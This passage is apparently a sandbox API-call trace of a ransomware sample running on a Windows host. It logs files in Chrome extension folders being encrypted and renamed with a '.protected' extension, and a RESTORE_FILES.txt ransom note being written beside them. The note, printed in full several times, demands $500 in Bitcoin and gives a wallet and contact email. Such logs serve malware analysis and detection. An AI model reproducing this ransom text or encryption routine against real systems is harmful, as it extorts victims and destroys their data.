RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.053] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.054] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.054] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.054] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.054] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.054] CloseHandle (hObject=0x164) returned 1 [0081.054] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") returned 1 [0081.054] lstrcmpiW (lpString1="hr", lpString2="System Volume Information") returned -1 [0081.054] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr") returned 145 [0081.054] lstrcmpW (lpString1="hr", lpString2=".") returned 1 [0081.054] lstrcmpW (lpString1="hr", lpString2="..") returned 1 [0081.054] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*") returned 147 [0081.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.054] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.054] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.054] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.054] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.054] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\.") returned 147 [0081.055] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.055] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.055] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.055] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.055] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.055] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.055] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\..") returned 148 [0081.055] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.055] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.055] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.055] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.055] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.055] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.055] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.055] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.055] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.055] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.055] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.056] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json") returned 159 [0081.056] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.056] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x279, lpOverlapped=0x0) returned 1 [0081.065] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.066] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x279, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x279, lpOverlapped=0x0) returned 1 [0081.066] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.066] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.066] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.066] CloseHandle (hObject=0x168) returned 1 [0081.066] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.protected") returned 169 [0081.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\messages.json.protected")) returned 1 [0081.067] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.067] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.067] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\RESTORE_FILES.txt") returned 163 [0081.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.068] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.068] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.069] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.069] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.069] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.069] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.069] CloseHandle (hObject=0x164) returned 1 [0081.069] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0081.069] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0081.069] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu") returned 145 [0081.069] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0081.069] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0081.069] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*") returned 147 [0081.069] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.070] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.070] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.070] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.070] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\.") returned 147 [0081.070] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.070] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.070] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.070] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.070] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.070] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\..") returned 148 [0081.070] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.070] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.070] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.070] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.070] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.070] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.070] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.070] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.070] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.070] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.071] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.071] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.072] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.072] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json") returned 159 [0081.072] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.072] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2c6, lpOverlapped=0x0) returned 1 [0081.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd3a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.073] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2c6, lpOverlapped=0x0) returned 1 [0081.073] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.073] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.074] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.074] CloseHandle (hObject=0x168) returned 1 [0081.074] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.protected") returned 169 [0081.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\messages.json.protected")) returned 1 [0081.075] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.075] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.075] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\RESTORE_FILES.txt") returned 163 [0081.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.075] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to 